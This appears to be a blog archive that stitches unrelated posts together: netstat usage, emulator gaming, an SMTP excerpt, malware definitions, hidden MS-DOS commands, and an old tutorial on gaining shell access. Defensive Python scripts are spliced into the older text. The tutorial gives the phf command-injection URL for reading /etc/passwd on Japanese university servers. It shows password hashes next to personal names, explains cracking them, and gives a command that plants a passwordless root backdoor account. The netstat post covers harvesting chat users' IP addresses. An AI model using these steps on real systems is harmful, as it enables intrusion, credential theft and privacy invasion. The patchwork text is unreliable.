Tuesday

Secure Computer: Use Of Netstat

Use Of Netstat


  (To OPEN Netstat) - To open [Netstat] you must do the following: Click on the
  [Start] button --> then click [Programs] --> then look for [Ms-Dos Prompt].

Netstat is a very helpful tool that has many uses. I personally use Netstat
to get IP addresses from other users I'm talking with on ICQ or AIM.  Also
you can use Netstat to monitor your port activity for attackers sending SYN
requests (part of the TCP/IP 3-way handshake) or just to see what ports are
listening/established. Look at the example below for the average layout of
a response to typing Netstat at the C:\windows\ prompt.



C:\WINDOWS>netstat

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    pavilion:25872         WARLOCK:1045           ESTABLISHED
  TCP    pavilion:25872         sy-as-09-112.free.net.au:3925  ESTABLISHED
  TCP    pavilion:31580         WARLOCK:1046           ESTABLISHED
  TCP    pavilion:2980          205.188.2.9:5190       ESTABLISHED
  TCP    pavilion:3039          24.66.10.101.on.wave.home.com:1031  ESTABLISHED



Now look above at the example. You will see [Proto] on the top left. This just
tells you if the protocol is TCP/UDP etc. Next to the right you will see
[Local Address]; this just tells you the local IP/host name and the open port. Then
to the right once again you will see [Foreign Address]; this will give you the person's
IP/host name and port in the format IP:Port, with ":" in between the IP and the port.
And at last you will see [State], which simply states the state of the connection.
This can be ESTABLISHED if it is connected, or LISTENING if it is waiting for a connection.
Now with this knowledge we will dive deeper into how to use this for monitoring
port activity and detecting open ports in use.



Detecting Open ports


So now you are noticing something funny is going on with your computer? Your CD-ROM
tray is going crazy... opening and closing when you're doing nothing. And you say "What the
phruck is going on"... or you realize someone's been messing with a Trojan on your computer.
So now your goal is to locate what trojan it is so you can remove it, right? Well, you're right.
So you go to your MS-DOS prompt. Now there are many ways to use Netstat, and below is a help
menu. Look through it.



C:\WINDOWS>netstat ?

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

  -a            Displays all connections and listening ports.
  -e            Displays Ethernet statistics. This may be combined with the -s
                option.
  -n            Displays addresses and port numbers in numerical form.
  -p proto      Shows connections for the protocol specified by proto; proto
                may be TCP or UDP.  If used with the -s option to display
                per-protocol statistics, proto may be TCP, UDP, or IP.
  -r            Displays the routing table.
  -s            Displays per-protocol statistics.  By default, statistics are
                shown for TCP, UDP and IP; the -p option may be used to specify
                a subset of the default.
  interval      Redisplays selected statistics, pausing interval seconds
                between each display.  Press CTRL+C to stop redisplaying
                statistics.  If omitted, netstat will print the current
                configuration information once.



I personally like using (C:\Windows\Netstat -an), which displays all connections and
listening ports in the form of IP instead of hostname.  Notice how I did the command:
Netstat(space)-a(Displays all connections and listening ports.)n(in numerical form)
Netstat -an  - So doing that does TWO of the options at once; no need for -a -n.  So
now that you know how to use netstat to view all your connections and listening ports, you
can search for common ports like 12345 (old Netbus Trojan), 1243 (subseven) etc.  This
becomes very handy for everything, as you will soon find out. Take a break now and go chill
out on your couch and relax for about 5 minutes and let all this soak in, then come back
ready to learn more. :)
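
The port search described above can be scripted. The following Python is an added example, not part of the original text: it parses netstat -an output into its four columns and flags local ports that are on a watch list, plus connections stuck mid-handshake. The watch list holds only the two ports the text names, the sample output is constructed, and all function names are illustrative.

```python
"""Parse `netstat -an` output and flag local ports from a watch list."""
from collections import namedtuple

# Only the two ports named in the text; extend with your own list.
# A port match is a lead, not proof: any program can bind any port.
WATCH_PORTS = {12345: "NetBus (old)", 1243: "SubSeven"}

Conn = namedtuple(
    "Conn", "proto local_host local_port foreign_host foreign_port state")

# Constructed sample of `netstat -an` output (not captured from a real host).
SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.0.2.10:1243        198.51.100.7:4021      ESTABLISHED
  TCP    192.0.2.10:2980        203.0.113.9:5190       ESTABLISHED
  TCP    192.0.2.10:80          198.51.100.7:4022      SYN_RECEIVED
  UDP    0.0.0.0:137            *:*
"""


def split_endpoint(endpoint):
    """Split 'host:port' on the last colon; port is None for '*' or names."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port) if port.isdigit() else None


def parse_netstat(text):
    """Yield a Conn for every TCP/UDP row, skipping banner and header lines."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0].upper() not in ("TCP", "UDP"):
            continue
        lhost, lport = split_endpoint(fields[1])
        fhost, fport = split_endpoint(fields[2])
        # UDP rows carry no State column.
        state = fields[3] if len(fields) > 3 else ""
        yield Conn(fields[0].upper(), lhost, lport, fhost, fport, state)


def flag_watched(conns, watch=WATCH_PORTS):
    """Return (conn, label) for rows whose LOCAL port is on the watch list.

    Only the local side is checked: a watched port number on the foreign
    side just means this host is a client of some remote service.
    """
    return [(c, watch[c.local_port]) for c in conns if c.local_port in watch]


def half_open(conns):
    """Rows where an inbound SYN was answered but the final ACK is missing."""
    return [c for c in conns if c.state.upper() in ("SYN_RECEIVED", "SYN_RECV")]


if __name__ == "__main__":
    rows = list(parse_netstat(SAMPLE))
    for conn, label in flag_watched(rows):
        print(f"WATCH {conn.proto} local port {conn.local_port} ({label}) "
              f"state={conn.state or '-'} peer={conn.foreign_host}")
    for conn in half_open(rows):
        print(f"HALF-OPEN from {conn.foreign_host}:{conn.foreign_port} "
              f"to local port {conn.local_port}")
```

A few half-open rows are normal on a busy host; many of them from one or many peers at once is what the SYN monitoring mentioned earlier is looking for.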




SYN and ACK
When you hear SYN and ACK (ACKnowledge) you do not think of the communication of packets on
your system. Well let me tell you what SYN and ACK do.

    [SYN] - SYN in common words is a request for a connection used in the 3-way handshake
in TCP/IP. Once you send a SYN out for a connection, the target computer will reply with a
SYN and ACK. So basically when you see SYN in the [State] category, that means you are sending
out a request to connect to something.

    [ACK] - Now the ACK is an ACKnowledgement to the request made by a computer that is
trying to connect to you. Once a SYN is sent to you, you need to ACK it, then send back another
SYN to the computer requesting connection to confirm the packet sent was correct.

I sure hope that helped you understand a little more about SYN and ACK. If you have further
questions try looking for texts on TCP/IP (such as BSRF's TCP/IP text - blacksun.box.sk/tcpip.txt).
Now onto the fun stuff.




Using Netstat for ICQ and AIM


Have you ever wanted to get someone's IP address or hostname using [AOL Instant Messenger]
or [ICQ]? Well you're in luck.

    [AIM] - With AIM you cannot usually find the exact IP address without some trial and
error, because most of the time it seems to open up all online users on port 5190. So the
fewer users online, the easier it is. So go to the Ms-Dos Prompt and type netstat -n; here you
will see under [Foreign Address] an IP with port 5190. Now one of those IPs connected
to you with 5190 is going to be your target AIM user. Using trial and error to find out
is usually the easiest way.

    [ICQ] - To get the IP of an ICQ user using netstat is easy. Before talking to the person
on ICQ you must open the Ms-Dos Prompt and do netstat -n to list all IPs and ports. Write them
down or copy them somewhere you will remember to look back. Now it's time to find out his
IP. Message the user with a single message, then quickly do netstat -n. You will have a newly
added line with an IP address; just search for the new one in the list under foreign, and once
you find it you now have your buddy's IP without any patches or hacks. Pure skill :P.

Wednesday

Gaming on Laptop / netbook

You may have thought that gaming on slower notebooks and netbooks would be difficult, but this isn’t the case. You won’t be playing Mafia 2, but older games that are still considered some of the best ever made – like Chrono Trigger – are easily playable. I may update this thread with pictures for some of these emulators, but this will get you started.

You need

Minimum system requirements:

CPU: Intel Atom 1.6GHz +
RAM: 1GB +
GPU: Onboard +
HDD: 5GB +
OS: XP 

Recommended system settings

CPU: 3GHz Dual core +
RAM: 2GB +
GPU: AMD 4200 / 5500 series w/ 512MB VRAM +
HDD: As much as you can spare
OS: 7 (either x86-64 or x64)


The key to gaming on these systems is emulators. They are available for most systems and play fine on the minimum specs, with some detail settings turned down. The recommended specs should be able to push every setting to high, and enable HQ filters. If you have a 16:9 monitor you will see black mattes on some of these emulators.

So, these are some of your choices:

1)Dosbox – this will run a lot of classic DOS games. I installed Wolf 3D off a CD that I still had from the 90’s and it plays perfectly, with mattes on the left and right. You can also play older RTS’s etc.

2)ZSNES – this is a SNES emulator that you can use to play some classics such as Chrono Trigger or Secret of Mana

3)Nestopia – this is an NES emulator. Great for playing through the original Final Fantasy.

4)Visual Boy Advance – for old GBA games.

5)EPSXE – this is a PSX emulator that works for most PSX games, some need patches you can find online. You can rip your PSX games to HDD and play them via Imgburn

6)Pre 2004 games such as Black and White and Max Payne can be played on older laptops.

7)Other systems, MAME etc.

I tried these out on a laptop with a P9700/2.8GHz Core 2 with 6GB RAM and a 4500MHD/9300M GS chip. On a netbook with a standard Atom, you need to turn down some of the PSX settings to maintain a smooth frame rate.

For any system, you absolutely need the latest GPU driver and the latest DirectX. For EPSXE you might need to add it as a DEP exception if you have DEP enabled for all programs. Everything can be found online.

These games will swallow hours of a time, so take heed . . . .


Monday

Mail Transfer Protocol(SMTP)

SMTP Config
The objective of Simple Mail Transfer Protocol (SMTP) is to transfer
mail reliably and efficiently.
SMTP is independent of the particular transmission subsystem and
requires only a reliable ordered data stream channel. Appendices A,
B, C, and D describe the use of SMTP with various transport services.
A Glossary provides the definitions of terms as used in this
document.

An important feature of SMTP is its capability to relay mail across
transport service environments. A transport service provides an
interprocess communication environment (IPCE). An IPCE may cover one
network, several networks, or a subset of a network. 
It is important to realize that transport systems (or IPCEs) are not one-to-one with
networks. A process can communicate directly with another process 
through any mutually known IPCE. Mail is an application or use of
interprocess communication. Mail can be communicated between
processes in different IPCEs by relaying through a process connected
to two (or more) IPCEs. More specifically, mail can be relayed
between hosts on different transport systems by a host on both
transport systems.


Saturday

Shell



    
  Have a shell

I have read many a hacking e-zines, and 'how to hack' documents before. They
are ok, interesting etc.  but they always show you how to get root through a
shell, what people seem to forget is the fact that you have to actually get
the password before you can use a shell to an account. You might be lucky
and find that l:guest p:guest will work. In this text I will show you how
easy hacking is ( on old deformed systems ) and how you can get a shell of
some sort in 24 hours after reading this. I am not going to go on to explain
how to get root after getting a shell as there are 1000's of texts and C
programs which explain this.
OK, the very first thing you need to do is to have a WWW browser, a telnet
program, john the ripper kracker program ( i recommend ) and a good
dictionary file.
WWW Browser - Netrape or MSIE are fine
Telnet Program - One which lets you set which port you want to connect to
John The Ripper - Will be at http://www.sinnerz.com/darkfool
Dictionary File - Found at many hacking web sites. Do a search for one
Ok, every net user/wanna be hacker will have most of those programs and if
ya don't they're really easy to get a hold of.
OK, now I am going to tell you something about Japan. They make your stereo,
they made the bits inside your computer, they made your car, they made
everything electronic around you, you have their eyes at the end of your
nob, but they are rubbish at one thing, the internet and security. They
honestly don't know anything about internet security, I have rooted or got
shells on many a japanese servers. These are my favourite systems to attack
because they are soooooo easy. I am also told that Australian servers are
very easy too, some Berkeley University machines are very easy to krack too.
Next thing you got to do is fire up your WWW browser. Goto AltaVista
http://www.alta-vista.digital.com if you don't know already this is a search
engine which has some very nice advance features.
Once here in the search field box type this  url:ac.jp and press search,
this looks for all URL's with ac.jp in.  This is academic places in Japan,
similar to the US which has .edu instead. You will be presented with a load
of web pages which text you probably can't read because its all in some
funny language. More importantly is the URL which they point out, for
example, www.mo.cs.rekimoko.ac.jp    , notice the ac.jp at the end of it.
Click on the link to the site ( longer server urls are easier to break into
BTW ). When the URL appears on the WWW browser box at the top of the screen
add this line to the end of it.
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
or
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
i.e
http://www.mo.cs.rekimoko.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
To all you 313375 out there, yes, i know this is the phf technique and it is
virtually dead, but you'll be surprised where you can use this.
This technique of finding the password file to the system is old, it was
first used in November 1996 on the FBI web page by a few hackers. It has
been patched up by a lot of servers, so this won't work on www.nasa.gov or
most of www.*.com  but still works on many University servers outside of EU
and US.
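
For the server side of this request, the following Python is an added detection example, not part of the original text: it scans a web access log for requests to a script named phf and separates plain requests from those carrying an encoded newline in the query string, which is what the URL above relies on. The Common Log Format pattern, the severity labels and the sample lines are assumptions constructed for the example.

```python
"""Flag phf CGI probes (the request shown above) in a web access log."""
import re
from urllib.parse import unquote, urlsplit

# Common Log Format (assumed; adjust the pattern to your server's format):
# host ident user [time] "METHOD target PROTOCOL" status size
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed log lines using documentation addresses, not real traffic.
SAMPLE_LOG = """\
192.0.2.44 - - [01/Jan/2000:03:14:07 +0000] "GET /index.html HTTP/1.0" 200 2326
198.51.100.23 - - [01/Jan/2000:03:15:42 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1184
198.51.100.23 - - [01/Jan/2000:03:15:50 +0000] "GET /cgi/phf?Qalias=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 404 207
203.0.113.5 - - [01/Jan/2000:04:01:19 +0000] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 512
203.0.113.5 - - [01/Jan/2000:04:02:00 +0000] "GET /docs/phf.html HTTP/1.0" 200 900
"""


def classify(target):
    """Return 'injection', 'access' or None for one request target."""
    parts = urlsplit(target)
    # Decode the path so an encoded script name (%70hf) is still matched.
    segments = [seg.lower() for seg in unquote(parts.path).split("/")]
    if "phf" not in segments:
        return None
    decoded_query = unquote(parts.query)
    # A CR or LF inside the query is the separator that lets a second
    # command reach the shell behind the script.
    if "\n" in decoded_query or "\r" in decoded_query:
        return "injection"
    return "access"


def scan(log_text):
    """Return one finding dict per log line that touches phf."""
    findings = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if m is None:
            continue
        kind = classify(m["target"])
        if kind is None:
            continue
        if kind == "injection":
            # 200 means the script exists and answered: check what it returned.
            severity = "critical" if m["status"] == "200" else "high"
        else:
            severity = "info"
        findings.append({
            "host": m["host"],
            "time": m["time"],
            "status": int(m["status"]),
            "kind": kind,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['host']:15} status={f['status']} "
              f"{f['kind']} at {f['time']}")
```

A critical finding is the case to act on first: the response size in that log line shows how much output left the server, and the script itself should be removed from the CGI directory.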
Ok, once the URL has been entered you will see one of a number of things :-
Error 404
/cgi-bin/phf is not found on this server
OR
WARNING
You do not have permission to view /cgi-bin/phf/ on this server
There are a number of other things the server might say, but the thing you
want it to say is the following :-
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr.YmO.:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
maemae:dvUMqNmeeENFs:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
watanaby:ewF90K0gwXVD6:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
kake:kFph8HEM/aaAA:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
etc.......
This means you have hit the jackpot !
If you get something similar to this but all lines have something similar to
the following :-
root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu  TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
maemae:*:1016:10:Akiko Maeda:/home/user/maemae:/bin/csh
watanaby:*:1006:10:Yoshiaki WATANABE:/home/user/watanaby:/bin/csh
kake:*:1007:10:Tetsuro KAKESHITA:/home/user/kake:/bin/csh
( notice the * )  if you don't know already this means its shadowed and you
cannot work out the password using a shadowed file.
If some but not all of the logins have * in them its ok, its worthwhile
getting the ones which aren't shadowed, hey, a shell is a shell !
Get all the lines which aren't shadowed and then paste them into notepad,
write the name of the server in the top line of the file and save it.
Ok now for the next bit, this is fairly simple but can be a lengthy process
depending upon which speed machine you have and how big your password file
is and dictionary file. Use john the ripper or whatever password cracker you
are using, although i recommend john the ripper because its quick. This will
probably take a long time so go to the pub or have a drive or something.......
If you are lucky enough to work out the passwords to the logins then well
done, if you don't, then find another server or increase the size of your
dictionary file, make it as big as you can, the bigger the better, the more
luck you will have in finding the password.
OK, you got some passwords to a few logins, if you got root then jump around
the room with joy ( I do ). If you didn't then, well, at least you got
yourself some shells. Now, if you want to keep these shells without anyone
knowing then your best bet is to telnet to the site at port 79, you will
have a blank prompt, here type in the username of the account you cracked,
it will tell you the last time they logged in, do this for all the accounts,
use the account which isn't used very much, the best ones are the ones which
say ' User Never Logged On ' because then the account is basically yours !
{ Note: If you get root type the following at the shell prompt :-
echo "myserver::0:0:Test User:/:/bin/csh" >> \etc\passwd
This will allow you to log in to the server with l:myserver so you don't get
admin suspicious when they see people logging in as root. }
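
For administrators, the following Python is an added audit example, not part of the original text: it checks passwd-format text for the three conditions this text depends on, namely password hashes left in the world-readable file instead of a shadow file, empty password fields, and extra accounts with UID 0 such as the myserver line in the note above. The sample file is constructed (only the myserver line comes from the text), and the set of "no hash here" markers is an assumption covering the common conventions.

```python
"""Audit passwd-format text for unshadowed hashes and root-equivalent logins."""


def has_hash(pw_field):
    """True when the field holds a real hash rather than a placeholder.

    'x' means the hash lives in a shadow file; a leading '*' or '!'
    marks a locked or shadowed entry (assumed conventions).
    """
    return pw_field not in ("", "x") and not pw_field.startswith(("*", "!"))


# Constructed sample in /etc/passwd format. The hash is made up; the
# myserver line is the one from the note above.
SAMPLE_PASSWD = """\
root:x:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
alice:ab1Cd2Ef3Gh4I:1012:10:Constructed User:/home/user/alice:/bin/csh
myserver::0:0:Test User:/:/bin/csh
broken:line:with:too:few
"""


def audit_passwd(text):
    """Return a list of (line_number, login, issue) tuples."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((number, fields[0], "malformed entry"))
            continue
        login, pw_field, uid = fields[0], fields[1], fields[2]
        if pw_field == "":
            findings.append((number, login, "empty password field"))
        elif has_hash(pw_field):
            findings.append((number, login, "hash in world-readable file"))
        # Any second UID 0 login has root's privileges under another name.
        if uid.isdigit() and int(uid) == 0 and login != "root":
            findings.append((number, login, "extra UID 0 account"))
    return findings


def summarize(findings):
    """Count findings per issue so a recurring problem stands out."""
    counts = {}
    for _, _, issue in findings:
        counts[issue] = counts.get(issue, 0) + 1
    return counts


if __name__ == "__main__":
    results = audit_passwd(SAMPLE_PASSWD)
    for number, login, issue in results:
        print(f"line {number}: {login}: {issue}")
    print(summarize(results))
```

Run it against a copy of the real file on each host; a login that appears with both "empty password field" and "extra UID 0 account" matches the backdoor line described in the note.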
Hide yourself as much as possible, if you already have a shell then go
through that first when logging on, or, telnet to the hacked shell and then
re-telnet to the hacked shell using the hacked shell, if you see what I
mean, so your who appears as localhost. Get some C scripts which delete your
presence etc...
That's it, if there's demand to explain this in further detail then please
e-mail me telling me you want a follow up, I don't do personal help so don't
e-mail me asking for help PLEASE DON'T !

Friday

What is a trojan worm virus logic bomb?



Trojan:
     Remember the Trojan Horse? Bad guys hid inside it until they could get
     into the city to do their evil deed. A trojan computer program is
     similar. It is a program which does an unauthorized function, hidden
     inside an authorized program. It does something other than what it
     claims to do, usually something malicious (although not necessarily!),
     and it is intended by the author to do whatever it does. If it's not
     intentional, it's called a 'bug' or, in some cases, a feature :) Some
     virus scanning programs detect some trojans. Some virus scanning
     programs don't detect any trojans. No virus scanners detect all
     trojans.
Virus:
     A virus is an independent program which reproduces itself. It may
     attach to other programs, it may create copies of itself (as in
     companion viruses). It may damage or corrupt data, change data, or
     degrade the performance of your system by utilizing resources such as
     memory or disk space. Some virus scanners detect some viruses. No
     virus scanners detect all viruses. No virus scanner can protect
     against "any and all viruses, known and unknown, now and forevermore".
Worm:
     Made famous by Robert Morris, Jr. , worms are programs which reproduce
     by copying themselves over and over, system to system, using up
     resources and sometimes slowing down the systems. They are self
     contained and use the networks to spread, in much the same way viruses
     use files to spread. Some people say the solution to viruses and worms
     is to just not have any files or networks. They are probably correct.
     We would include computers.
Logic Bomb:
     Code which will trigger a particular form of 'attack' when a
     designated condition is met. For instance, a logic bomb could delete
     all files on Dec. 5th. Unlike a virus, a logic bomb does not make
     copies of itself.


Monday


Hidden MS-DOS Commands

Collection of undocumented and obscure features in various MS-DOS versions.

Contents:

- TRUENAME
- FDISK /STATUS
- FDISK /MBR
- SHELL=C:\COMMAND.COM /P /F
- COMMAND /F
- COMMAND /P
- COMMAND /D
- VER /R
- ECHO OFF and ECHO ON
- FORMAT /AUTOTEST
- FORMAT /BACKUP
- FORMAT /SELECT
- FORMAT /SELECT /U
- FORMAT /H
- IF EXIST <dirname>\NUL <command> and IF EXIST EMMXXXX0 <command>
- Using ATTRIB to hide directories
- SWITCHES=/W
- FOR %%V IN (/SOMETHING)
- DIR,
- COPY. A:
- DOS?=HIGH
- INSTALLHIGH
- Using : for batch file comments
- REM in lines with pipes or redirection
- Delimiter character

===========================================================================
 TRUENAME
 --------

Internal DOS 5.0 command.  Canonicalizes a filename or path (using DOS interrupt 21h, function 60) and prints the actual directory.

     Syntax:

     TRUENAME filename   - Prints the complete path to file.
     TRUENAME directory  - Prints the complete path to directory.

Note:  If the path is in a network, it starts with a \\machine-name.

TRUENAME is analogous to the UNIX "whence" command.  It returns the real fully-qualified path name for a command.

TRUENAME is useful in networks, where a physical drive may be mapped to a logical volume, and the user needs to know the physical location of the file.  It ignores the DOS SUBST and JOIN commands, or network MAPped drives.

TRUENAME is an undocumented MS-DOS feature, but it is documented in JP Software's 4DOS software (COMMAND.COM replacement) as follows:

     Syntax:

     TRUENAME [d:][path]filename

     Purpose:

     Returns a fully qualified filename.

     Comments:

     TRUENAME will see "through" JOIN and SUBST commands, and
     requires MS-DOS 3.0 or above.

     Example:

     The following command uses TRUENAME to get the true pathname
     for a file:

     c:\>subst d: c:\util\test
     c:\>truename d:\test.exe

     c:\util\test\test.exe

TRUENAME : will reveal the full name drive and path of the filename.  If you specify a wildcard (*) in the filename, it will expand the filename to use question marks instead.  If the path includes the ..\ sequence, TRUENAME will examine the directory structure and calculate the path.

Stranger still, the line:

     TRUENAME \CRONK\FLIBBET\..\ART

...produces the response:

     C:\CRONK\ART

...even if the directories \CRONK\FLIBBET and the file ART don't exist!  Don't expect this command to work well across networks.  After all, this is still undocumented in MS-DOS for a reason!

===========================================================================
 FDISK /STATUS
 -------------

Prints a screen just like using option 4 of FDISK, "Partition information", but includes extended partition information.  Nice if you want to get an overview without fear of pressing the wrong keys.

Doesn't work in DOS 3.30.

===========================================================================
 FDISK /MBR
 ----------

MS-DOS 5.0 FDISK has an undocumented parameter, /MBR, that causes it to write the master boot record to the hard disk without altering the partition table information.  While this feature is not documented, it can be told to customers on a need-to-know basis.

Warning:  Writing the master boot record to the hard disk in this manner can make certain hard disks partitioned with SpeedStor unusable.  It can also cause problems for some dual-boot programs, or for disks with more than 4 partitions.  Specific information is below.

What is the MBR?

At the end of the ROM BIOS bootstrap routine, the BIOS will read and execute the first physical sector of the first floppy or hard drive on the system. This first sector of the hard disk is called the master boot record, or sometimes the partition table or master boot block. At the beginning of this sector of the hard disk is a small program. At the end of this sector is where the partition information, or partition table, is stored. This program uses the partition information to determine which partition is bootable (usually the first primary DOS partition) and attempts to boot from it.
This program is what is written to the disk by FDISK /MBR and is usually called the master boot record.  During normal operation, FDISK only writes this program to the disk if there is no master boot record.
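
The sector layout described above can be checked with a short script. The following Python is an added example, not part of the original text: it validates a 512-byte MBR, lists the partition entries, finds the active one, and hashes the boot program so it can be compared with a known-good baseline. The sample sector is synthetic, the function names are illustrative, and the baseline workflow is an assumption; the offsets (table at 446, 55 AA at 510) are the standard MBR layout.

```python
"""Parse a 512-byte master boot record and fingerprint its boot program."""
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 440        # boot program; later Windows keeps a disk ID in 440..445
TABLE_OFFSET = 446         # four 16-byte partition entries start here
ENTRY = struct.Struct("<B3sB3sII")   # status, CHS start, type, CHS end, LBA, count
SIGNATURE = b"\x55\xaa"    # bytes 510..511 of every valid MBR


def build_sample_mbr(boot_code=b"\xfa\x33\xc0\x8e\xd0"):
    """Build a synthetic sector for the demo (constructed, not a real disk)."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(boot_code)] = boot_code
    # One active partition, type 0x06 (FAT16), starting at LBA 63.
    sector[TABLE_OFFSET:TABLE_OFFSET + ENTRY.size] = ENTRY.pack(
        0x80, b"\x01\x01\x00", 0x06, b"\x0f\x3f\x20", 63, 204561)
    sector[510:512] = SIGNATURE
    return bytes(sector)


def parse_mbr(sector):
    """Return the boot-code hash and the non-empty partition entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    if sector[510:512] != SIGNATURE:
        raise ValueError("missing 55 AA signature: not a valid MBR")
    partitions = []
    for index in range(4):
        offset = TABLE_OFFSET + index * ENTRY.size
        status, _, ptype, _, lba, count = ENTRY.unpack_from(sector, offset)
        if ptype == 0:          # type 0 marks an unused slot
            continue
        partitions.append({
            "index": index,
            "active": status == 0x80,
            "status_valid": status in (0x00, 0x80),
            "type": ptype,
            "lba_start": lba,
            "sectors": count,
        })
    digest = hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest()
    return {"boot_code_sha256": digest, "partitions": partitions}


def review_mbr(sector, known_good_sha256=None):
    """Return warnings about the table and, given a baseline, the boot code."""
    info = parse_mbr(sector)
    warnings = []
    active = [p for p in info["partitions"] if p["active"]]
    if len(active) != 1:
        warnings.append(f"{len(active)} active partitions, expected exactly one")
    for part in info["partitions"]:
        if not part["status_valid"]:
            warnings.append(f"entry {part['index']}: status byte is not 00 or 80")
    if known_good_sha256 and info["boot_code_sha256"] != known_good_sha256:
        warnings.append("boot code differs from known-good baseline")
    return warnings


if __name__ == "__main__":
    clean = build_sample_mbr()
    baseline = parse_mbr(clean)["boot_code_sha256"]
    changed = build_sample_mbr(boot_code=b"\xeb\xfe")   # same table, new program
    print(parse_mbr(clean)["partitions"])
    print(review_mbr(clean, baseline))
    print(review_mbr(changed, baseline))
```

Take the baseline hash right after a clean install or after running FDISK /MBR from trusted media; a later mismatch with an unchanged partition table means only the boot program was rewritten.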

Why is the MBR changed during Setup?

During installation of Microsoft MS-DOS 5 Upgrade, Setup will replace the master boot record on the hard disk with code to display the message:
        The MS-DOS 5.0 Setup was not completed.
        Insert the UNINSTALL #1 diskette in drive A.
        Press the ENTER key to continue.

This message should be erased and the master boot code rewritten before Setup is completed. If a problem occurs during Setup and you return to the previous MS-DOS, UNINSTAL should also remove this message. However, should Setup or UNINSTAL fail to remove this message, or should the master boot record become corrupted, a new master boot record can be written to the disk using the following command:

         C:\>fdisk /mbr

     WARNINGS:

     This option should not be used if:

        - the disk was partitioned using Storage Dimensions'
          SpeedStor utility with its /Bootall option
        - more than 4 partitions exist
        - certain dual-boot programs are in use

Storage Dimensions' SpeedStor utility using the /Bootall option redefines the drive's physical parameters (cylinder, head, sector).  /BOOTALL stores information on how the drive has been changed in an area of the master boot record that MS-DOS does not use. FDISK /MBR will erase that information, making the disk unusable.

Some older OEM versions of MS-DOS and some third-party partitioning utilities can create more than 4 partitions.  The additional partition information is commonly stored in an area that FDISK /MBR will overwrite.

Some dual-boot programs have a special MBR that asks the user which operating system they want on bootup.  FDISK /MBR erases this program.  Dual-boot systems that boot whichever partition is marked Active are not affected by FDISK /MBR.

If you have a Boot Sector Virus, just boot from a known "clean" floppy disk that's write protected and which has FDISK on it, and run FDISK /MBR.

===========================================================================
 SHELL=C:\COMMAND.COM /P /F
 --------------------------

The /F in the CONFIG.SYS SHELL= statement forces a "Fail" response to all "Abort, Retry, Fail" prompts issued by the DOS critical error handler.

===========================================================================
 COMMAND /F
 ----------

Entered on the command line, COMMAND /F makes all those annoying "Abort, Retry, Ignore, Fail" disk error messages default to "Fail" from then on until rebooting.

===========================================================================
 COMMAND /P
 ----------

For DOS 3.30 (not checked with other versions):  Docs say that this doesn't allow you to exit back to the previous shell, but /P also forces AUTOEXEC.BAT to be run on secondary shells.

===========================================================================
 COMMAND /D
 ----------

When used with a primary shell, or secondary with /P, prevents execution of AUTOEXEC.BAT.

===========================================================================
 VER /R
 ------

Yields extended information about the DOS version:

     MS-DOS Version 5.00
     Revision A
     DOS is in HMA

Doesn't work with DOS 3.30.  VER /R is a documented feature of JP Software's 4DOS.

===========================================================================
 ECHO OFF and ECHO ON
 --------------------

Entering ECHO OFF from the command line erases the prompt and leaves just a cursor on the screen.  ECHO ON from the command line restores the prompt.  This works with all versions of DOS.

One of the most frequently asked questions is "How do I ECHO a blank line in a batch file?"  The most common answer is to use ECHO directly followed by a period:  ECHO. like so.  However, just about any "white space" character will work, as well as any "delimiter".  The following alternatives can be used:  ECHO.  ECHO"  ECHO,  ECHO:  ECHO;  ECHO[  ECHO]  etc.  Apparently it's just the way that the command handles the delimiter and has been available from way back!  Microsoft just began mentioning it in the documentation recently, though, and their examples use a period.

===========================================================================
 FORMAT /AUTOTEST
 ----------------

The autotest parameter will allow FORMAT to proceed, checking the existing format of the disk (unless the /U parameter with DOS 5 or 6 is also present), and proceeding with the format.

All this will take place with no delay and no waiting for user input.  It will also end without pausing.  It will not ask for a volume label or whether to format another diskette.

WARNING!  This procedure will also work on hard drives!  Be very cautious if you plan to use this feature!

===========================================================================
 FORMAT /BACKUP
 --------------

This works exactly like /AUTOTEST, but it does ask for a volume label.

===========================================================================
 FORMAT /SELECT
 --------------

This is like the DOS MIRROR command... For safety-fanatics only.

===========================================================================
 FORMAT /SELECT /U
 -----------------

Just makes a disk unreadable.  Guess it could be handy?

===========================================================================
